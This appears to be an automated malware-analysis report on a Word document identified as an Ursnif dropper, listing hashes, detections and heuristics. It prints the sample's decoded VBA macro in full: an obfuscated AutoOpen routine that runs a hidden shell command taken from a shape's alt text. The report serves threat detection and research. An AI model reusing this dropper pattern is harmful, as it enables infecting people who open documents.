Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 e0ffdd04b3af736b…

MALICIOUS

Office (OLE)

69.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: b13a892584259c1a2d8918e1d0f24ada SHA-1: 258173e0bdef55ec3ae7417cf8e883f5e88d0c24 SHA-256: e0ffdd04b3af736be09e7679fdfecb7a8385f6f7ee7a6cdf6969ae7bedc6737f
142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Ursnif-6864686-0, indicating it is likely part of the Ursnif family. The presence of an AutoOpen VBA macro, detected by multiple heuristics, suggests that the macro executes automatically when the document is opened. The script uses the `Interaction.Shell` function with a command derived from the `AlternativeText` property of a shape, likely to download and execute a secondary payload. This behavior is consistent with a dropper functionality.

Heuristics 5

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1640 bytes
SHA-256: 8c4fdcdf2cc6e7937dddaf08afeceeb552a0753432cfde2d57c0c5f1a592cebf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wzoruko"
Function eilSlW()





Dim gcuxywubity As Integer
Dim aHOZaDf As Long
gcuxywubity = 6104# - 7043#
Dim YlQHFc As Variant
YlQHFc = gcuxywubity - 7460#

Dim exdritnb As Integer
Dim zpigyxaqil As Long
exdritnb = 7049# - 2756#
Dim KbDwHUVa As Variant
KbDwHUVa = exdritnb - 9382#

Dim pfyq As Integer
Dim KzcinsbA As Long
pfyq = 2670# - 2787#
Dim wvew As Variant
wvew = pfyq - 4419#

Set eilSlW = ActiveDocument.Shapes(2)





End Function
Sub AutoOpen()



Dim sJPaJS As Integer
Dim viKxTBb As Long
sJPaJS = 9384# - 5903#
Dim vQWtk As Variant
vQWtk = sJPaJS - 3452#

Dim rmilylyk As Integer
Dim gfepyk As Long
rmilylyk = 5441# - 9871#
Dim lrir As Variant
lrir = rmilylyk - 3558#

Set lfymolyse = eilSlW

vferuqonew = eilSlW.AlternativeText



Dim KYPSk As Integer
Dim uWQKmd As Long
KYPSk = 1418# - 6769#
Dim ppyv As Variant
ppyv = KYPSk - 7648#

Interaction.Shell@ _
vferuqonew, vbHide

Dim nqaka As Integer
Dim smuxuzekyk As Long
nqaka = 6758# - 9948#
Dim FihyBu As Variant
FihyBu = nqaka - 6991#



Dim kDCKB As Integer
Dim lqikufyli As Long
kDCKB = 4628# - 7756#
Dim jzox As Variant
jzox = kDCKB - 7267#

Dim shifyjaqoj As Integer
Dim Drslzf As Long
shifyjaqoj = 4451# - 2592#
Dim HwodWdo As Variant
HwodWdo = shifyjaqoj - 5713#

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.